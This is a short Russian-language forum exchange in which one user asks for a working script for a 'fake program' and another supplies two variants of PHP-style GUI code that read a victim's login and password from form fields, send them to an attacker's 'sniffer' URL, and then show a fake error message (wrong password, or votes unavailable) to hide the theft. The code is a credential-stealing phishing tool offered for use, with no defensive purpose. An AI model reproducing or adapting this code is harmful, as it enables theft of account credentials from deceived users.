Наталья Андрушко

Дайте скрипт рабочий для фейк-программы

Александра Кузнецова

вот $edit1 = c('Form1->edit1')->text;
$edit2 = c('Form1->edit2')->text;
$url = "Ссылка на ваш сниффер";
file_get_contents($url . "?" . "Логин: " . $edit1 . " | Пароль: " . $edit2);
MessageBox("Неверно введён логин или пароль", "Ошибка ввода");
если со снифером то вот зарегайся на снифере и напиши код с картинки

$edit1 = c('Form1->edit1')->text;
$edit2 = c('Form1->edit2')->text;
$combobox1 = c('Form1->combobox1')->inText;
$url = "сюда впиши код с картинки снифера";
file_get_contents($url . "?" . "login:" . $edit1 . "|pass:" . $edit2);
MessageBox("Простите! Услуга временно недоступна", "Приносим свои извинения! Голоса не могут быть отправленны! ");